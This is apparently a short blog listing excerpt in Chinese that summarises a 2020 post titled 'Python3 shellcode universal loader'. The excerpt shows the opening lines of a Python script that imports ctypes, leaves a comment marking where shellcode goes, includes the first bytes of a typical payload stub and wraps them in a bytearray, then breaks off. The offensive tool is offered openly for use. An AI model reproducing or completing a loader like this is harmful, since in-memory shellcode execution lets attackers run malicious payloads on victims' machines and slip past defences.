摘要: Python3 shellcode通用加载器 #!/usr/bin/python3 import ctypes #shellcode 放这个位置 c = b"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31" shellcode = bytearray(c) ptr 阅读全文
posted @ 2020-11-25 09:57 Saint_Michael 阅读(1408) 评论(0) 推荐(0)